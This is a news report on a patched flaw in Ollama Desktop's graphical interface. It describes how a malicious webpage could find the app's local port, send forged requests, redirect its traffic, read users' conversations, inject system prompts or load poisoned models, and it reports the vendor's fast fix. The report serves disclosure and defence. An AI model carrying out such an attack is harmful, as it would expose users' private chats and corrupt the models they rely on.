Flawed AI Tool: How a Simple Website Could Have Hijacked Your Ollama App
A vulnerability in the widely used AI deployment tool Ollama exposed users to the risk of drive-by attacks, enabling malicious actors to surreptitiously interfere with the local application through a specially crafted website. Exploitation allowed attackers to read private conversations and even replace active models, including the installation of tainted variants.
The flaw was discovered and disclosed on July 31 by Chris Moberly, Senior Security Manager at GitLab. It affected Ollama Desktop v0.10.0 and stemmed from an improper implementation of CORS controls within the local web service powering the graphical interface. As a result, JavaScript embedded in a malicious webpage could scan the victim’s machine for open ports in the range 40,000–65,535, identify the random port used by Ollama’s GUI, and issue forged “simple” POST requests to alter settings and redirect traffic to an attacker-controlled server.
Once the configuration was subverted, the adversary could intercept all local requests, read conversations, and manipulate AI responses in real time—all while the victim saw nothing more suspicious than a regular website. The attack required no clicks or user interaction. Worse still, attackers could inject their own system prompts or load “poisoned” models, gaining complete control over the application’s behavior.
Moberly remarked that exploitation of the flaw “would have been trivial in real-world conditions,” noting that even the preparation of the attack infrastructure could have been automated using LLMs. Fortunately, the Ollama team acted swiftly: within ninety minutes of disclosure they acknowledged the issue, and just an hour later released v0.10.1, which resolved the bug. For users who installed Ollama via official installers, a simple restart applied the auto-update, while those who installed through Homebrew were required to update manually.
Proof-of-concept code and a technical write-up have been published by Moberly on GitLab. While there is currently no evidence of the vulnerability being exploited in the wild, the researcher strongly urges all Ollama users to verify that the patch has been applied.
The Ollama project itself is designed to enable local execution of LLM models on macOS and Windows. The vulnerability did not impact the core Ollama API but was confined exclusively to the newly introduced graphical interface, which had only been available for a few weeks before the flaw was uncovered. A CVE identifier has not yet been assigned.